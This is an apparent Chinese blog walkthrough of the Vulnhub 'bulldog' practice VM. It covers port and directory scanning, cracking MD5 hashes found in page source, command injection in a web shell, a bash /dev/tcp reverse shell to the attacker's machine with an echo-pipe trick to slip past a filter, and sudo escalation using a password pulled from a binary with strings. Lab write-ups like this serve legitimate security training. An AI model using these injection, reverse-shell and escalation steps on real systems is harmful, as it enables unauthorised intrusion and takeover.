Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/
下载将其导入VMware,设置网络模式为NAT模式,开启靶机虚拟机
在kali攻击机使用命令nmap -Pn 192.168.172.1/24来获取靶机的IP地址

这里如果实在扫不出来靶机IP地址的话参考这篇文章来进行设置
https://blog.csdn.net/qq_45722813/article/details/121324686

得到靶机IP地址后再使用命令nmap -A -p- 192.168.172.137扫描靶机的操作系统及版本,开放端口和服务等,这里发现靶机操作系统版本,开放端口为23对应ssh服务,80和8080端口都对应http服务

然后打开浏览器在地址栏输入靶机IP地址回车打开网页

点开“Public Notice”查看,这里我用划词翻译翻译了一下,但是好像没什么用

然后我们在kali命令行中输入dirb http://192.168.172.137扫描后台目录发现了/admi/dev/dev/shell/

然后再浏览器地址栏输入http://192.168.172.137/admin,发现一个登录页面

查看源码,没有什么信息和提示

把地址栏换成http://192.168.172.137/dev/回车看看,还是一堆英文,但是最下面看到有一些好像是啥用户名或邮箱地址的东西

再把地址栏的地址换成http://192.168.172.137/dev/shell,提示我们要先想服务器验证才能使用shell

所以回到刚才的http://192.168.172.137/dev/,然后我们查看源码,发现一些奇怪的东西

猜测应该是MD5,然后拿去md5解码,得到了nick对应的解码为nulldog,sarah对应的解码为nulldoglover,

然后回到开始的登录页面,输入用户名和密码进行登录

登录进去发现还说什么也没有,查看源码也没什么东西

现在再回到http://192.168.172.137/dev/shell/,发现可以打开页面了,还有一个shell输入框并告诉了可以输入哪些命令,这里应该是远程命令执行

输入ifconfig | ls有ls的显示,存在命令注入

然后我们尝试反弹shell,首先在kali机使用命令nc -lnvp 6666进行监听

然后在web-shell的输入框中输入命令bash -i >& /dev/tcp/192.168.172.131/6666 0>&1执行,但是发现被挡了,他发现我进行攻击了

然后换种方式,输入命令echo "bash -i >& /dev/tcp/192.168.172.131/6666 0>&1" | bash,执行就可以了

成功反弹shell

查看目录,在/home目录下发现一个bulldogadmin

但是进到bulldogadmin目录下什么都没有

首先使用命令cat /etc/passwd查看所有用户

同时发现bulldogadmin是一个用户,所以使用命令find / -user bulldogadmin 2>/dev/null查找bulldogadmin用户的文件,发现这几个隐藏文件

使用命令cat /home/bulldogadmin/.hiddenadmindirectory/note查看文件内容

全是英文,将其复制到百度翻译中进行翻译

再查看另一个文件,命令cat /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp查看,但是全是乱码

使用命令strings /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp将文件内容转化为可打印字符
然后直接使用sudo su命令进行提权,发现不行

出现上面的情况是因为我们是反弹回来的nc shell,这个shell的使用是有限制的,我们要使用命令python -c "import pty; pty.spawn('/bin/bash')"设置tty,将其转化为交互式shell,以便能够完全交互和使用其所有功能

还是不行,要在命令前面加上sudo才有权限执行

可以是可以了,但是需要输入用户密码,先试一下bulldog,但是发现不行

刚才我们将那个乱码文件转化后显示的内容中有一串super password之类的字符串,去掉其中的H组成字符串SUPERultimatePASSWORDyouCANTget,发现成了,已经提权到root用户

输入cd回车跳转到根目录下,ls命令查看文件及目录,发现有个congrats.txt文件,使用命令cat congrats.txt打开文件查看内容

它提示这里有两种方式提权到root用户权限,还有一种暂时不知道,就到这里了

参考文章:
https://www.freebuf.com/column/200047.html

Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)相关推荐

  1. Vulnhub靶场渗透测试系列DC-2(wpscan使用和git提权)

    Vulnhub靶场渗透测试系列DC-2(wpscan使用和git提权) 靶机地址:https://www.five86.com/dc-2.html 下载靶机将其导入到VMware,然后设置网络模式为N ...

  2. Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码)

    Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码) 靶机下载地址:https://www.vulnhub.com/entry/dc-7,356/ ...

  3. 118.网络安全渗透测试—[权限提升篇16]—[Windows MSF提权模块提权审计工具]

    我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.MSF 结合漏洞审计工具进行提权 1.MSF漏洞审计模块:local_exploit_suggeste 2. ...

  4. 《WEB安全渗透测试》(27)Linux系统提权-SUID提权

    1.SUID提权介绍 提权,网络术语,指的是提高自己在服务器中的权限,如从普通用户提高到root用户,当网站被入侵后,攻击者会千方百计的去提高自己的权限,毕竟普通用户能干的事情太有限了. linux中 ...

  5. 【安全练兵场】| BurpSuite靶场系列之命令注入(5个实验)

    文章来源|MS08067 安全练兵场 知识星球 本文作者:godunt(安全练兵场星球合伙人) 玩靶场 认准安全练兵场 什么是"安全练兵场"? 目前,安全行业热度逐年增加,很多新手 ...

  6. kali渗透测试系列---信息收集

    kali 渗透测试系列 文章目录 kali 渗透测试系列 信息收集 信息收集 信息收集阶段可以说是在整个渗透测试或者攻击很重要的阶段,毕竟知己知彼才能百战百胜,否则从目标主机使用的平台到数据库的使用再 ...

  7. base64 linux_渗透测试常用Linux命令总结

    作为一名网络安全工作者,一说到渗透测试,所有人都会想到Kali Linux,Kali Linux系统是一款预装了许多渗透测试软件的Linux系统,是最常用的一款渗透测试系统工具,既然是一款Linux系 ...

  8. 【甄选靶场】Vulnhub百个项目渗透——项目十六:FristiLeaks_1.3(文件上传,py脚本改写,sudo提权,脏牛提权,源码获取)

    Vulnhub百个项目渗透 Vulnhub百个项目渗透--项目十六:FristiLeaks_1.3(文件上传,py脚本改写,sudo提权,脏牛提权,源码获取) 靶场地址

  9. Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权

    Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...

最新文章

  1. SpringBoot 定时任务动态管理通用解决方案
  2. OC实例变量和属性-@synthesize与@property
  3. nginx在linux自动启动脚本,nginx的自动启动脚本
  4. BZOJ 1041 数学
  5. OpenCV-连环画效果(海贼王yyds)
  6. 剑指offer面试题[42]-反转单词顺序VS左旋转字符串
  7. Xpath定位方法深入探讨及元素定位失败常见情况
  8. wps显示ntko签章服务器,ntko-系统内装有OFFICE和WPS,如何让IE加载NTKOOFFICE时以office打开文件而不是以WPS打...
  9. 吉客云与金蝶云星空集成方案(吉客云主管库存)
  10. Linux挂在netapp存储,使用NFS4协议在NETAPP存储下不能MOUNT的分析和解决
  11. jquery插件中找到好玩插件 http://www.jq22.com/
  12. 电脑上安装的matlab软件打不开怎么办,电脑软件打不开没反应怎么办?
  13. 如何使用Excel绘制图表?
  14. AT-GAN: A Generative Attack Model for Adversarial Transferring on Generative Adversarial Nets
  15. MCDF-lab4中部分代码理解
  16. iOS 局域网内搜索硬件设备
  17. volvo手机能用鸿蒙系统吗,不是华为手机,也能用上鸿蒙系统
  18. 30系显卡怎么配置rangenet++和SuMa++
  19. 安卓手机如何投屏到电视上_安卓和苹果手机投屏到智能电视方法
  20. matlab find函数详解

热门文章

  1. 爬虫之旅(二):爬取b站搜索数据
  2. 知到测试---大学生心理健康教育
  3. bandizip右键选项设置方法步骤
  4. WMS 系统出入库理解
  5. android m是什么版本号,android m是什么 android m是哪个版本
  6. MySQL--局域网、外网访问MySQL
  7. skimage.filters.frangi函数
  8. 感悟和体会数据结构和算法
  9. 计算机英语邓广慧,地方高校理工类大学生专业英语教学改革探讨
  10. 2015浙大计算机考研,2015浙大计算机考研机试题解.pdf